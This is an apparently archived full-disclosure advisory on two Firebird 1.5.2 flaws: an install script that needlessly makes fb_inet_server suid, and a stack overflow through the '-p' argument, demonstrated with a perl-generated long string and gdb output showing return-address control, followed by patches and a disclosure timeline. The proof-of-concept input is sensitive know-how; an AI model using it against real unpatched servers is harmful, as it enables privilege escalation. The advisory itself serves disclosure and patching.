Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11789
HistoryMar 13, 2006 - 12:00 a.m.

[Full-disclosure] Buffer Overflow and Installation Script Error in Firebird 1.5.3

2006-03-1300:00:00
vulners.com
23

 Buffer Overflow and Installation Script Error in Firebird 1.5.3

Author: Jose Antonio Coret (Joxean Koret)
Date: 2005-02-18
Location: Basque Country


Affected software description:


Product: Firebird 
Vulnerable Version: 1.5.2.4731

Description:

Firebird is a relational database offering many ANSI SQL-99 features that runs
on Linux, Windows, and a variety of Unix platforms. Firebird offers excellent 
concurrency, high performance, and powerful language support for stored 
procedures and triggers. It has been used in production systems, under a variety 
of names since 1981.

Web : http://firebird.sourceforge.net

---------------------------------------------------------------------------

Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily
B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

Vulnerabilities:
~~~~~~~~~~~~~~~~

A.- Install script makes fb_inet_server and fbserver suid firebird unnecesarily

 - The installation script of Firebird 1.5.2 makes the binaries fb_inet_server 
and fbserver suid firebird but this is unnecesary. If you takes a look to the 
install script "firebird1.5.2.XXXX/scripts/postinstall.sh" you will see the 
following lines:

    (...)
    # SUID is still needed for group direct access.  General users
    # cannot run though.
    for i in fb_lock_mgr gds_drop fb_inet_server
    do
        if [ -f $i ]
          then
            chmod ug=rx,o= $i
            chmod ug+s $i
        fi
    done
    (...)

but, as the author says the fb_inet_server (at least) doesn't need to be suid firebird.
The following is a fragment of Alex Peshkov (a Firebird developer) response about 
this problem: 

        They need not and should not be set*id. And in standard precompiled 
        binaries fbserver is not setuid. But for unknown to me reasons 
        fb_inet_server is made setuid 'firebird' by install script (Debian guys 
        fixed it, I think). I've noticed it, unfortunately, after release of 
        1.5.2, but definitely will fix it in future releases. Except security 
        vulnerability this brings additional problem when one wants to change 
        fb_inet_server run-user - changing only xinetd.d entry is not enough.

 - Debian distributions are not vulnerable to this problem. As the Alex Peshkov says
Debian people has been fixed it.

B.- Buffer overflow in suid firebird fb_inet_server and fbserver binaries

 - The '-p' argument to the fb_inet_server and fbserver binaries is vulnerable 
to buffer overflows. If an string of more than 150 characters is passed to the
'-p' parameter of any of these binaries the program will crash with a 
"Segmentation Fault" message.

 - The following is a test of the vulnerability:
 
        /usr/lib/firebird2/bin$ ls
        fb_lock_print  fbguard  fbmgr  fbmgr.bin  fbserver  gsec
        /usr/lib/firebird2/bin$ ./fbserver -p `perl -e 'print "a"x155;'`1234
        Segmentation fault
        
        The program dies abruptly. The bytes passeds from position 155 to 159
        overwrites the return address:
        
        /usr/lib/firebird2/bin$ gdb ./fbserver
        GNU gdb 6.3
        (...)
        (gdb) run -p `perl -e 'print "a"x155;'`4321
        Starting program: /usr/lib/firebird2/bin/fbserver -p `perl -e 'print
        "a"x155;'`4321
        (...)   
        Program received signal SIGSEGV, Segmentation fault.
        [Switching to Thread -1210892160 (LWP 25358)]
        0x31323334 in ?? ()

We have been overwrite the return address with the bytes 0x31 0x32 0x33 0x34, 
the numbers 4 3 2 1 in reverse order.

        (gdb) where
        #0  0x31323334 in ?? ()
        #1  0x08233496 in ?? ()
        #2  0x00000000 in ?? ()
        #3  0xbffff9b0 in ?? ()
        #4  0x00006161 in ?? ()
        #5  0x00000000 in ?? ()
        #6  0x00000000 in ?? ()
        #7  0x00000000 in ?? ()
        #8  0x00000000 in ?? ()
        #9  0x00000000 in ?? ()
        #10 0xbffff9b0 in ?? ()
        #11 0x00000000 in ?? ()
        #12 0x00000000 in ?? ()
        #13 0x00000000 in ?? ()
        #14 0xbffffb04 in ?? ()
        #15 0x0804e370 in ?? ()
        #16 0x00000000 in ?? ()
        #17 0xbffffd50 in ?? ()
        #18 0x00000000 in ?? ()
        #19 0x00000000 in ?? ()
        #20 0x00000000 in ?? ()
        #21 0x00000000 in ?? ()
        #22 0x00000000 in ?? ()

Notes:
~~~~~~

 - Various other problems, not discovered by me, has been fixed in the 1.5.3
version. I encourage to upgrade to the newest version as soon as possible.

Patches for the 1.5.2 version:
  • The following are patches to solve ONLY the problems that I have been found.

Patch for installation script:


--------------------START OF THE PATCH----------------------------
--- scripts/postinstall.sh      2005-03-25 14:24:40.091819144 +0100
+++ scripts/postinstall.sh.corrected    2005-03-25 14:08:47.777592912 +0100
@@ -401,7 +401,7 @@

     # SUID is still needed for group direct access.  General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
         if [ -f $i ]
           then
@@ -508,7 +508,7 @@

     # SUID is still needed for group direct access.  General users
     # cannot run though.
-    for i in fb_lock_mgr gds_drop fb_inet_server
+    for i in fb_lock_mgr gds_drop
     do
       if [ -f $i ]
         then
---------------------END OF THE PATCH------------------------------


Patch for fb_inet_server and/or fbserver buffer overflow:

--------------------START OF THE PATCH----------------------------
— src/remote/inet_server.cpp 2004-09-29 12:03:39.000000000 +0200
+++ src/remote/inet_server.cpp.corrected 2005-03-25 14:17:59.698688152 +0100
@@ -32,7 +32,7 @@
*
/
/

-$Id: inet_server.cpp,v 1.26.2.2 2004/09/29 10:03:39 paul_reeves Exp $
+$Id: inet_server.cpp,v 1.26.2.3 2005/03/23 12:59:25 alexpeshkoff Exp $
*/
#include "firebird.h"
#include "…/jrd/ib_stdio.h"
@@ -277,7 +277,10 @@
break;

                            case 'P':
  •                                   sprintf(protocol, "/%s", *argv++);
    
  •                                   protocol[0] = '/';
    
  •                                   protocol[1] = 0;
    
  •                                   strncat(protocol, *argv++,
    
  •                                           sizeof(protocol) - strlen(protocol) - 1);
                                      break;
    
               case 'H':
    

@@ -407,12 +410,9 @@

/* before starting the superserver stuff change directory to tmp */
if (CHANGE_DIR(TEMP_DIR)) {

  •           char err_buf[1024];
    
  •           /* error on changing the directory */
    
  •           sprintf(err_buf, "Could not change directory to %s due to errno %d",
    
  •           gds__log("Could not change directory to %s due to errno %d",
                              TEMP_DIR, errno);
    
  •           gds__log(err_buf);
      }
    

/* Server tries to attash to security.fdb to make sure everything is OK
---------------------END OF THE PATCH------------------------------

The fix:


The problems are fixed, in the current 1.5.3 version of the Firebird binary 
distribution.

Thanks
~~~~~~

Thanks to Alex Peshkov, he where very kind and professional.

Timeline:

2005-02-18: Initial contact.
2005-02-11: Contact with Alex Peshkov.
2005-03-25: BOF (and various others) fixed in CVS.
2005-03-25: Wait for ~2 months after the 1.5.3 release.
2006-01-25: Firebird 1.5.3 released.
2006-03-12: Public disclosure.

Disclaimer:


The information in this advisory and any of its demonstrations is provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es